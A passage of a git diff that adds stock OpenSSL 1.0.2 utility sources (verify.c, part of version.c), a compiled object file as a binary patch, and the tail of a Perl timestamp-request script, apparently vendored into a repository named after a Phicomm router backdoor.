+	    or warn("$input: could not open input file: $!\n"), next REQUEST;
+        $body = <INPUT>;
+        close INPUT
+	    or warn("$input: could not close input file: $!\n"), next REQUEST;
+    }
+
+    # Send request.
+    STDERR->printflush("sending request") if $options{v};
+
+    my ($ts_body, $error) = get_timestamp $curl, \$body;
+    if (defined($error)) {
+	die "$input: fatal error: $error\n";
+    }
+    STDERR->printflush(", reply received") if $options{v};
+
+    # Write response.
+    if ($output eq "-") {
+	# Write to STDOUT.
+        print $ts_body;
+    } else {
+	# Write to file.
+        open OUTPUT, ">", $output
+	    or warn("$output: could not open output file: $!\n"), next REQUEST;
+        print OUTPUT $ts_body;
+        close OUTPUT
+	    or warn("$output: could not close output file: $!\n"), next REQUEST;
+    }
+    STDERR->printflush(", $output written.\n") if $options{v};
+}
+$curl->cleanup();
+WWW::Curl::Easy::global_cleanup();
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/verify.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/verify.c
new file mode 100644
index 0000000..b3ba53d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/verify.c
@@ -0,0 +1,352 @@
+/* apps/verify.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include "apps.h"
+#include <openssl/bio.h>
+#include <openssl/err.h>
+#include <openssl/x509.h>
+#include <openssl/x509v3.h>
+#include <openssl/pem.h>
+
+#undef PROG
+#define PROG    verify_main
+
+static int MS_CALLBACK cb(int ok, X509_STORE_CTX *ctx);
+static int check(X509_STORE *ctx, char *file,
+                 STACK_OF(X509) *uchain, STACK_OF(X509) *tchain,
+                 STACK_OF(X509_CRL) *crls, ENGINE *e);
+static int v_verbose = 0, vflags = 0;
+
+int MAIN(int, char **);
+
+int MAIN(int argc, char **argv)
+{
+    ENGINE *e = NULL;
+    int i, ret = 1, badarg = 0;
+    char *CApath = NULL, *CAfile = NULL;
+    char *untfile = NULL, *trustfile = NULL, *crlfile = NULL;
+    STACK_OF(X509) *untrusted = NULL, *trusted = NULL;
+    STACK_OF(X509_CRL) *crls = NULL;
+    X509_STORE *cert_ctx = NULL;
+    X509_LOOKUP *lookup = NULL;
+    X509_VERIFY_PARAM *vpm = NULL;
+    int crl_download = 0;
+#ifndef OPENSSL_NO_ENGINE
+    char *engine = NULL;
+#endif
+
+    cert_ctx = X509_STORE_new();
+    if (cert_ctx == NULL)
+        goto end;
+    X509_STORE_set_verify_cb(cert_ctx, cb);
+
+    ERR_load_crypto_strings();
+
+    apps_startup();
+
+    if (bio_err == NULL)
+        if ((bio_err = BIO_new(BIO_s_file())) != NULL)
+            BIO_set_fp(bio_err, stderr, BIO_NOCLOSE | BIO_FP_TEXT);
+
+    if (!load_config(bio_err, NULL))
+        goto end;
+
+    argc--;
+    argv++;
+    for (;;) {
+        if (argc >= 1) {
+            if (strcmp(*argv, "-CApath") == 0) {
+                if (argc-- < 1)
+                    goto end;
+                CApath = *(++argv);
+            } else if (strcmp(*argv, "-CAfile") == 0) {
+                if (argc-- < 1)
+                    goto end;
+                CAfile = *(++argv);
+            } else if (args_verify(&argv, &argc, &badarg, bio_err, &vpm)) {
+                if (badarg)
+                    goto end;
+                continue;
+            } else if (strcmp(*argv, "-untrusted") == 0) {
+                if (argc-- < 1)
+                    goto end;
+                untfile = *(++argv);
+            } else if (strcmp(*argv, "-trusted") == 0) {
+                if (argc-- < 1)
+                    goto end;
+                trustfile = *(++argv);
+            } else if (strcmp(*argv, "-CRLfile") == 0) {
+                if (argc-- < 1)
+                    goto end;
+                crlfile = *(++argv);
+            } else if (strcmp(*argv, "-crl_download") == 0)
+                crl_download = 1;
+#ifndef OPENSSL_NO_ENGINE
+            else if (strcmp(*argv, "-engine") == 0) {
+                if (--argc < 1)
+                    goto end;
+                engine = *(++argv);
+            }
+#endif
+            else if (strcmp(*argv, "-help") == 0)
+                goto end;
+            else if (strcmp(*argv, "-verbose") == 0)
+                v_verbose = 1;
+            else if (argv[0][0] == '-')
+                goto end;
+            else
+                break;
+            argc--;
+            argv++;
+        } else
+            break;
+    }
+
+#ifndef OPENSSL_NO_ENGINE
+    e = setup_engine(bio_err, engine, 0);
+#endif
+
+    if (vpm)
+        X509_STORE_set1_param(cert_ctx, vpm);
+
+    lookup = X509_STORE_add_lookup(cert_ctx, X509_LOOKUP_file());
+    if (lookup == NULL)
+        abort();
+    if (CAfile) {
+        i = X509_LOOKUP_load_file(lookup, CAfile, X509_FILETYPE_PEM);
+        if (!i) {
+            BIO_printf(bio_err, "Error loading file %s\n", CAfile);
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+    } else
+        X509_LOOKUP_load_file(lookup, NULL, X509_FILETYPE_DEFAULT);
+
+    lookup = X509_STORE_add_lookup(cert_ctx, X509_LOOKUP_hash_dir());
+    if (lookup == NULL)
+        abort();
+    if (CApath) {
+        i = X509_LOOKUP_add_dir(lookup, CApath, X509_FILETYPE_PEM);
+        if (!i) {
+            BIO_printf(bio_err, "Error loading directory %s\n", CApath);
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+    } else
+        X509_LOOKUP_add_dir(lookup, NULL, X509_FILETYPE_DEFAULT);
+
+    ERR_clear_error();
+
+    if (untfile) {
+        untrusted = load_certs(bio_err, untfile, FORMAT_PEM,
+                               NULL, e, "untrusted certificates");
+        if (!untrusted)
+            goto end;
+    }
+
+    if (trustfile) {
+        trusted = load_certs(bio_err, trustfile, FORMAT_PEM,
+                             NULL, e, "trusted certificates");
+        if (!trusted)
+            goto end;
+    }
+
+    if (crlfile) {
+        crls = load_crls(bio_err, crlfile, FORMAT_PEM, NULL, e, "other CRLs");
+        if (!crls)
+            goto end;
+    }
+
+    ret = 0;
+
+    if (crl_download)
+        store_setup_crl_download(cert_ctx);
+    if (argc < 1) {
+        if (1 != check(cert_ctx, NULL, untrusted, trusted, crls, e))
+            ret = -1;
+    } else {
+        for (i = 0; i < argc; i++)
+            if (1 != check(cert_ctx, argv[i], untrusted, trusted, crls, e))
+                ret = -1;
+    }
+
+ end:
+    if (ret == 1) {
+        BIO_printf(bio_err,
+                   "usage: verify [-verbose] [-CApath path] [-CAfile file] [-purpose purpose] [-crl_check]");
+        BIO_printf(bio_err, " [-attime timestamp]");
+#ifndef OPENSSL_NO_ENGINE
+        BIO_printf(bio_err, " [-engine e]");
+#endif
+        BIO_printf(bio_err, " cert1 cert2 ...\n");
+
+        BIO_printf(bio_err, "recognized usages:\n");
+        for (i = 0; i < X509_PURPOSE_get_count(); i++) {
+            X509_PURPOSE *ptmp;
+            ptmp = X509_PURPOSE_get0(i);
+            BIO_printf(bio_err, "\t%-10s\t%s\n",
+                       X509_PURPOSE_get0_sname(ptmp),
+                       X509_PURPOSE_get0_name(ptmp));
+        }
+    }
+    if (vpm)
+        X509_VERIFY_PARAM_free(vpm);
+    if (cert_ctx != NULL)
+        X509_STORE_free(cert_ctx);
+    sk_X509_pop_free(untrusted, X509_free);
+    sk_X509_pop_free(trusted, X509_free);
+    sk_X509_CRL_pop_free(crls, X509_CRL_free);
+    apps_shutdown();
+    OPENSSL_EXIT(ret < 0 ? 2 : ret);
+}
+
+static int check(X509_STORE *ctx, char *file,
+                 STACK_OF(X509) *uchain, STACK_OF(X509) *tchain,
+                 STACK_OF(X509_CRL) *crls, ENGINE *e)
+{
+    X509 *x = NULL;
+    int i = 0, ret = 0;
+    X509_STORE_CTX *csc;
+
+    x = load_cert(bio_err, file, FORMAT_PEM, NULL, e, "certificate file");
+    if (x == NULL)
+        goto end;
+    fprintf(stdout, "%s: ", (file == NULL) ? "stdin" : file);
+
+    csc = X509_STORE_CTX_new();
+    if (csc == NULL) {
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+    X509_STORE_set_flags(ctx, vflags);
+    if (!X509_STORE_CTX_init(csc, ctx, x, uchain)) {
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+    if (tchain)
+        X509_STORE_CTX_trusted_stack(csc, tchain);
+    if (crls)
+        X509_STORE_CTX_set0_crls(csc, crls);
+    i = X509_verify_cert(csc);
+    X509_STORE_CTX_free(csc);
+
+    ret = 0;
+ end:
+    if (i > 0) {
+        fprintf(stdout, "OK\n");
+        ret = 1;
+    } else
+        ERR_print_errors(bio_err);
+    if (x != NULL)
+        X509_free(x);
+
+    return (ret);
+}
+
+static int MS_CALLBACK cb(int ok, X509_STORE_CTX *ctx)
+{
+    int cert_error = X509_STORE_CTX_get_error(ctx);
+    X509 *current_cert = X509_STORE_CTX_get_current_cert(ctx);
+
+    if (!ok) {
+        if (current_cert) {
+            X509_NAME_print_ex_fp(stdout,
+                                  X509_get_subject_name(current_cert),
+                                  0, XN_FLAG_ONELINE);
+            printf("\n");
+        }
+        printf("%serror %d at %d depth lookup:%s\n",
+               X509_STORE_CTX_get0_parent_ctx(ctx) ? "[CRL path]" : "",
+               cert_error,
+               X509_STORE_CTX_get_error_depth(ctx),
+               X509_verify_cert_error_string(cert_error));
+        switch (cert_error) {
+        case X509_V_ERR_NO_EXPLICIT_POLICY:
+            policies_print(NULL, ctx);
+        case X509_V_ERR_CERT_HAS_EXPIRED:
+
+            /*
+             * since we are just checking the certificates, it is ok if they
+             * are self signed. But we should still warn the user.
+             */
+
+        case X509_V_ERR_DEPTH_ZERO_SELF_SIGNED_CERT:
+            /* Continue after extension errors too */
+        case X509_V_ERR_INVALID_CA:
+        case X509_V_ERR_INVALID_NON_CA:
+        case X509_V_ERR_PATH_LENGTH_EXCEEDED:
+        case X509_V_ERR_INVALID_PURPOSE:
+        case X509_V_ERR_CRL_HAS_EXPIRED:
+        case X509_V_ERR_CRL_NOT_YET_VALID:
+        case X509_V_ERR_UNHANDLED_CRITICAL_EXTENSION:
+            ok = 1;
+
+        }
+
+        return ok;
+
+    }
+    if (cert_error == X509_V_OK && ok == 2)
+        policies_print(NULL, ctx);
+    if (!v_verbose)
+        ERR_clear_error();
+    return (ok);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/verify.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/verify.o
new file mode 100644
index 0000000000000000000000000000000000000000..dea6f9cdd66056ef7cb367cb7fabb378ebde7fcc
GIT binary patch
literal 10352
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/version.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/version.c
new file mode 100644
index 0000000..8807d4c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/version.c
@@ -0,0 +1,214 @@
+/* apps/version.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include "apps.h"
+#include <openssl/evp.h>
+#include <openssl/crypto.h>
+#include <openssl/bn.h>
+#ifndef OPENSSL_NO_MD2
+# include <openssl/md2.h>
+#endif
+#ifndef OPENSSL_NO_RC4
+# include <openssl/rc4.h>
+#endif
+#ifndef OPENSSL_NO_DES
+# include <openssl/des.h>
+#endif
+#ifndef OPENSSL_NO_IDEA
+# include <openssl/idea.h>
+#endif
+#ifndef OPENSSL_NO_BF
+# include <openssl/blowfish.h>
+#endif
+
+#undef PROG
+#define PROG    version_main
+
+int MAIN(int, char **);
+
+int MAIN(int argc, char **argv)
+{
+    int i, ret = 0;
+    int cflags = 0, version = 0, date = 0, options = 0, platform = 0, dir = 0;
+
+    apps_startup();
+
+    if (bio_err == NULL)
+        if ((bio_err = BIO_new(BIO_s_file())) != NULL)
+            BIO_set_fp(bio_err, stderr, BIO_NOCLOSE | BIO_FP_TEXT);
+
+    if (argc == 1)
+        version = 1;
+    for (i = 1; i < argc; i++) {
+        if (strcmp(argv[i], "-v") == 0)
+            version = 1;
+        else if (strcmp(argv[i], "-b") == 0)
+            date = 1;
+        else if (strcmp(argv[i], "-f") == 0)
+            cflags = 1;
+        else if (strcmp(argv[i], "-o") == 0)
+            options = 1;
+        else if (strcmp(argv[i], "-p") == 0)
+            platform = 1;
+        else if (strcmp(argv[i], "-d") == 0)
+            dir = 1;
+        else if (strcmp(argv[i], "-a") == 0)
+            date = version = cflags = options = platform = dir = 1;
+        else {
+            BIO_printf(bio_err, "usage:version -[avbofpd]\n");
+            ret = 1;
+            goto end;
+        }
+    }
+
+    if (version) {
